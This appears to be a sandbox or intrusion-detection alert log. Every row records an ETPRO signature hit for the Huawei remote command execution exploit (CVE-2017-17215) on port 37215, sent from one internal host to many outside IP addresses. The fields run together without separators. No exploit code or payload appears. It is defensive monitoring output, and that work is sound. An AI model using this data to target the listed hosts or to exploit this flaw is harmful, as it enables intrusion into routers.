                                                        06/13/24-21:32:54.707077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613437215192.168.2.14197.252.67.9
                                                        06/13/24-21:32:23.935166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487637215192.168.2.14156.248.67.23
                                                        06/13/24-21:32:40.378154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005837215192.168.2.14156.209.22.97
                                                        06/13/24-21:32:21.785487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033837215192.168.2.14156.161.132.173
                                                        06/13/24-21:33:13.212575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435837215192.168.2.14156.178.3.15
                                                        06/13/24-21:32:58.844039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603837215192.168.2.14156.6.17.17
                                                        06/13/24-21:32:52.680841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855437215192.168.2.1441.231.45.116
                                                        06/13/24-21:32:17.677542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055837215192.168.2.1441.10.234.38
                                                        06/13/24-21:32:34.215337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336637215192.168.2.14156.36.43.132
                                                        06/13/24-21:32:42.403689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140237215192.168.2.14197.198.65.77
                                                        06/13/24-21:32:07.403824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061237215192.168.2.1441.160.66.115
                                                        06/13/24-21:32:15.611164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453037215192.168.2.1441.114.241.60
                                                        06/13/24-21:32:23.831082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485637215192.168.2.14156.53.36.231
                                                        06/13/24-21:32:32.154907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4471837215192.168.2.1441.255.63.53
                                                        06/13/24-21:32:15.604740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818837215192.168.2.1441.121.151.72
                                                        06/13/24-21:31:57.154325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276037215192.168.2.14197.182.139.161
                                                        06/13/24-21:32:07.417044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434437215192.168.2.14197.2.51.49
                                                        06/13/24-21:32:09.458461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322437215192.168.2.14156.172.41.91
                                                        06/13/24-21:32:36.264622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125637215192.168.2.14156.79.243.152
                                                        06/13/24-21:33:09.130787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640237215192.168.2.14156.141.121.214
                                                        06/13/24-21:33:11.159708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859237215192.168.2.14197.176.219.133
                                                        06/13/24-21:32:34.199301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.1441.249.4.117
                                                        06/13/24-21:33:17.308428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342037215192.168.2.14156.93.197.48
                                                        06/13/24-21:32:32.169501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291037215192.168.2.14156.144.17.180
                                                        06/13/24-21:32:46.503104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.14197.50.165.228
                                                        06/13/24-21:32:21.802528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634037215192.168.2.14197.55.11.210
                                                        06/13/24-21:32:36.244520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796037215192.168.2.14197.184.52.238
                                                        06/13/24-21:33:15.274394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.1441.59.137.252
                                                        06/13/24-21:33:11.154064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542837215192.168.2.1441.253.241.151
                                                        06/13/24-21:32:25.973446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259837215192.168.2.1441.131.212.135
                                                        06/13/24-21:32:46.502617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227637215192.168.2.14156.74.141.211
                                                        06/13/24-21:32:58.824194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824637215192.168.2.1441.84.75.40
                                                        06/13/24-21:32:21.799433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991637215192.168.2.14156.229.172.4
                                                        06/13/24-21:31:57.136158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716037215192.168.2.14197.224.67.201
                                                        06/13/24-21:32:17.676745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211437215192.168.2.14156.168.136.69
                                                        06/13/24-21:32:52.657068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878237215192.168.2.14156.143.231.189
                                                        06/13/24-21:33:00.884550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554437215192.168.2.1441.225.27.104
                                                        06/13/24-21:32:38.302937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621837215192.168.2.1441.72.21.205
                                                        06/13/24-21:32:40.355389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381437215192.168.2.14156.149.89.142
                                                        06/13/24-21:32:58.824520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256237215192.168.2.14197.18.30.137
                                                        06/13/24-21:32:46.504108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699237215192.168.2.1441.30.95.109
                                                        06/13/24-21:31:59.173854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540837215192.168.2.1441.191.223.228
                                                        06/13/24-21:33:07.057952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493037215192.168.2.14197.84.11.242
                                                        06/13/24-21:32:30.097113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523037215192.168.2.14197.53.28.115
                                                        06/13/24-21:32:11.507869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601437215192.168.2.14156.62.116.8
                                                        06/13/24-21:32:32.151051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756437215192.168.2.1441.151.131.239
                                                        06/13/24-21:31:59.173795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223037215192.168.2.14197.208.79.238
                                                        06/13/24-21:32:07.402083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223837215192.168.2.14156.53.53.215
                                                        06/13/24-21:32:21.786089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863437215192.168.2.1441.10.115.198
                                                        06/13/24-21:33:07.042161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216037215192.168.2.14197.87.64.108
                                                        06/13/24-21:32:30.125074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800437215192.168.2.14197.171.223.69
                                                        06/13/24-21:32:38.318491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602837215192.168.2.14156.180.101.170
                                                        06/13/24-21:33:11.174005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469237215192.168.2.14156.108.117.11
                                                        06/13/24-21:32:23.942670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793237215192.168.2.1441.236.112.224
                                                        06/13/24-21:32:50.617424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056637215192.168.2.14197.163.205.69
                                                        06/13/24-21:32:07.416186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138837215192.168.2.1441.58.95.158
                                                        06/13/24-21:33:07.041698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225437215192.168.2.14156.221.192.208
                                                        06/13/24-21:33:15.258050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608837215192.168.2.14156.30.33.115
                                                        06/13/24-21:32:07.416633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010637215192.168.2.14197.185.171.21
                                                        06/13/24-21:32:56.754685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568837215192.168.2.14197.243.0.169
                                                        06/13/24-21:32:32.151964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448637215192.168.2.1441.200.52.213
                                                        06/13/24-21:32:03.278237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920237215192.168.2.14156.73.112.15
                                                        06/13/24-21:32:19.751528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369037215192.168.2.14197.84.47.165
                                                        06/13/24-21:32:58.821299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185237215192.168.2.14197.239.36.147
                                                        06/13/24-21:33:17.340836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231037215192.168.2.14197.244.239.245
                                                        06/13/24-21:32:52.658070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.14197.154.206.255
                                                        06/13/24-21:32:13.567686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.14197.155.249.92
                                                        06/13/24-21:32:54.726460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725437215192.168.2.14156.250.179.43
                                                        06/13/24-21:32:15.605202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595837215192.168.2.14156.127.41.73
                                                        06/13/24-21:33:15.253173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857437215192.168.2.1441.137.226.234
                                                        06/13/24-21:32:11.509093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.14156.34.79.176
                                                        06/13/24-21:32:42.420462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564037215192.168.2.1441.235.143.241
                                                        06/13/24-21:32:54.706883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.14156.107.64.159
                                                        06/13/24-21:32:56.758696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564237215192.168.2.1441.100.210.76
                                                        06/13/24-21:32:19.752631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425437215192.168.2.14156.246.18.20
                                                        06/13/24-21:33:00.889186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929637215192.168.2.14156.137.142.148
                                                        06/13/24-21:32:28.027140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915037215192.168.2.1441.233.137.162
                                                        06/13/24-21:32:32.151667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862837215192.168.2.14197.98.32.181
                                                        06/13/24-21:33:09.102012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887237215192.168.2.14197.28.138.195
                                                        06/13/24-21:31:57.137506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005037215192.168.2.1441.154.194.136
                                                        06/13/24-21:32:21.784052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.1441.60.68.20
                                                        06/13/24-21:33:07.041625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201837215192.168.2.14197.177.117.71
                                                        06/13/24-21:32:03.277008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944637215192.168.2.14197.136.2.96
                                                        06/13/24-21:32:36.266959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990237215192.168.2.14156.170.49.93
                                                        06/13/24-21:32:03.277043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299837215192.168.2.14156.224.73.220
                                                        06/13/24-21:32:32.151190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034837215192.168.2.14156.85.244.168
                                                        06/13/24-21:32:32.153751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829037215192.168.2.14156.166.236.212
                                                        06/13/24-21:32:44.476664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982237215192.168.2.14156.74.134.140
                                                        06/13/24-21:32:03.294483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857237215192.168.2.14156.196.212.117
                                                        06/13/24-21:33:13.214450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252637215192.168.2.14197.197.205.93
                                                        06/13/24-21:32:23.942624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793837215192.168.2.14197.196.194.177
                                                        06/13/24-21:32:46.509596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980237215192.168.2.14197.188.104.92
                                                        06/13/24-21:31:57.092439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755037215192.168.2.14197.112.42.248
                                                        06/13/24-21:33:07.040187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147037215192.168.2.14197.254.11.159
                                                        06/13/24-21:32:30.078233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082637215192.168.2.14197.68.7.219
                                                        06/13/24-21:32:34.215554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810437215192.168.2.1441.82.189.193
                                                        06/13/24-21:32:21.804357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779037215192.168.2.14156.184.9.210
                                                        06/13/24-21:33:09.109706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313637215192.168.2.14197.56.7.250
                                                        06/13/24-21:32:05.349499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869037215192.168.2.1441.76.106.103
                                                        06/13/24-21:32:13.547165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947237215192.168.2.1441.10.193.207
                                                        06/13/24-21:32:03.305756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344637215192.168.2.1441.19.25.177
                                                        06/13/24-21:33:15.272626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944837215192.168.2.1441.182.236.11
                                                        06/13/24-21:32:38.298581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208437215192.168.2.14156.0.250.234
                                                        06/13/24-21:32:58.840089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371637215192.168.2.14156.75.77.221
                                                        06/13/24-21:33:00.872162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612237215192.168.2.14197.207.17.254
                                                        06/13/24-21:32:11.485000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952037215192.168.2.1441.175.85.36
                                                        06/13/24-21:33:07.041316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.14156.129.134.231
                                                        06/13/24-21:32:01.246627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277837215192.168.2.14156.149.71.33
                                                        06/13/24-21:32:17.694046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347637215192.168.2.1441.16.60.118
                                                        06/13/24-21:32:32.154653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963437215192.168.2.1441.7.71.48
                                                        06/13/24-21:33:04.988702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732437215192.168.2.14156.235.251.24
                                                        06/13/24-21:32:11.485888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917437215192.168.2.14197.241.40.252
                                                        06/13/24-21:32:17.695945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459237215192.168.2.14197.19.112.142
                                                        06/13/24-21:32:21.779836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974037215192.168.2.14156.152.102.216
                                                        06/13/24-21:33:04.991992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676437215192.168.2.14197.226.103.221
                                                        06/13/24-21:32:05.348313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918437215192.168.2.1441.216.170.26
                                                        06/13/24-21:32:01.241642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232237215192.168.2.1441.110.70.62
                                                        06/13/24-21:33:15.256181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381437215192.168.2.1441.215.144.165
                                                        06/13/24-21:32:32.153814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913837215192.168.2.14197.247.132.210
                                                        06/13/24-21:32:07.416805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096037215192.168.2.1441.88.143.127
                                                        06/13/24-21:32:56.782699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930637215192.168.2.14156.59.255.28
                                                        06/13/24-21:32:50.612587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017637215192.168.2.1441.84.246.58
                                                        06/13/24-21:32:25.991501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348037215192.168.2.1441.28.68.34
                                                        06/13/24-21:32:40.357040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468237215192.168.2.14197.29.112.112
                                                        06/13/24-21:32:56.759091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884437215192.168.2.1441.34.129.121
                                                        06/13/24-21:32:03.274719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998237215192.168.2.14156.81.45.147
                                                        06/13/24-21:32:56.791460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940437215192.168.2.14156.80.115.200
                                                        06/13/24-21:32:03.276779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372637215192.168.2.14156.109.239.35
                                                        06/13/24-21:32:13.544062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055437215192.168.2.14156.135.128.249
                                                        06/13/24-21:32:15.611086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084637215192.168.2.1441.172.10.205
                                                        06/13/24-21:32:56.757801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581037215192.168.2.1441.242.131.31
                                                        06/13/24-21:31:59.196114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.14197.216.251.19
                                                        06/13/24-21:32:09.440590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791437215192.168.2.14156.77.115.176
                                                        06/13/24-21:33:00.870696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090437215192.168.2.1441.184.121.254
                                                        06/13/24-21:32:36.269801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108837215192.168.2.14156.183.141.197
                                                        06/13/24-21:32:07.404393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025837215192.168.2.1441.162.147.142
                                                        06/13/24-21:32:42.424305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856637215192.168.2.14197.251.194.13
                                                        06/13/24-21:32:52.678918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617237215192.168.2.14197.88.32.136
                                                        06/13/24-21:33:09.089806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269837215192.168.2.14156.0.240.238
                                                        06/13/24-21:32:54.727107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894237215192.168.2.14197.221.40.80
                                                        06/13/24-21:32:48.571043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953237215192.168.2.14197.222.8.62
                                                        06/13/24-21:32:32.154872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917837215192.168.2.14197.97.66.160
                                                        06/13/24-21:33:02.953922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075037215192.168.2.14197.211.13.95
                                                        06/13/24-21:32:48.553810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682437215192.168.2.1441.35.104.146
                                                        06/13/24-21:32:48.571748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822437215192.168.2.14197.228.42.126
                                                        06/13/24-21:32:30.073847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563037215192.168.2.1441.149.73.123
                                                        06/13/24-21:33:09.087972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658037215192.168.2.14197.154.250.207
                                                        06/13/24-21:32:11.485127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3415037215192.168.2.14197.121.195.184
                                                        06/13/24-21:32:05.350659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517237215192.168.2.14156.169.101.97
                                                        06/13/24-21:32:11.510133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652637215192.168.2.14156.136.173.83
                                                        06/13/24-21:32:42.403982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031237215192.168.2.14156.151.141.142
                                                        06/13/24-21:32:25.970547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307637215192.168.2.1441.162.217.201
                                                        06/13/24-21:32:30.099337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373637215192.168.2.14197.14.138.148
                                                        06/13/24-21:33:00.888164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550437215192.168.2.1441.227.228.146
                                                        06/13/24-21:32:25.968166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709837215192.168.2.14156.216.86.115
                                                        06/13/24-21:33:02.952512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527237215192.168.2.14197.159.164.1
                                                        06/13/24-21:32:40.377861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438037215192.168.2.14156.182.175.253
                                                        06/13/24-21:32:52.676157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775237215192.168.2.14156.118.116.112
                                                        06/13/24-21:32:52.679449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002637215192.168.2.1441.247.239.35
                                                        06/13/24-21:32:38.301843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987437215192.168.2.1441.243.80.120
                                                        06/13/24-21:32:19.730276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.1441.164.222.12
                                                        06/13/24-21:32:25.995500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337437215192.168.2.1441.3.88.236
                                                        06/13/24-21:32:42.407550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774637215192.168.2.1441.199.145.105
                                                        06/13/24-21:32:09.441016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669637215192.168.2.14156.31.184.185
                                                        06/13/24-21:33:13.212184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773237215192.168.2.14156.132.212.166
                                                        06/13/24-21:31:59.196471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791237215192.168.2.14197.67.9.14
                                                        06/13/24-21:32:11.485595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558437215192.168.2.14197.184.92.194
                                                        06/13/24-21:32:19.751384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017837215192.168.2.14197.84.23.59
                                                        06/13/24-21:32:03.306735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564637215192.168.2.14197.15.218.165
                                                        06/13/24-21:32:23.832513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691637215192.168.2.14197.65.145.146
                                                        06/13/24-21:32:23.832376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557837215192.168.2.14156.49.112.79
                                                        06/13/24-21:32:07.402652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684837215192.168.2.14197.49.146.254
                                                        06/13/24-21:32:30.076671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786637215192.168.2.14156.100.240.20
                                                        06/13/24-21:32:23.832594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778637215192.168.2.1441.250.11.240
                                                        06/13/24-21:33:05.010550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.14156.186.93.210
                                                        06/13/24-21:33:15.273017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518037215192.168.2.1441.91.157.219
                                                        06/13/24-21:32:03.307489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578237215192.168.2.14156.111.19.202
                                                        06/13/24-21:32:48.554961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.14197.171.71.157
                                                        06/13/24-21:32:11.487674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669837215192.168.2.14156.164.54.241
                                                        06/13/24-21:32:07.418191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354837215192.168.2.14197.251.242.46
                                                        06/13/24-21:33:02.913172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329237215192.168.2.14197.16.36.24
                                                        06/13/24-21:32:28.027646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738237215192.168.2.1441.125.182.239
                                                        06/13/24-21:31:57.131082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446837215192.168.2.14197.46.38.93
                                                        06/13/24-21:32:21.800977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.14156.194.199.111
                                                        06/13/24-21:32:48.549940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190237215192.168.2.14156.117.216.134
                                                        06/13/24-21:33:07.041961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910237215192.168.2.14197.50.194.214
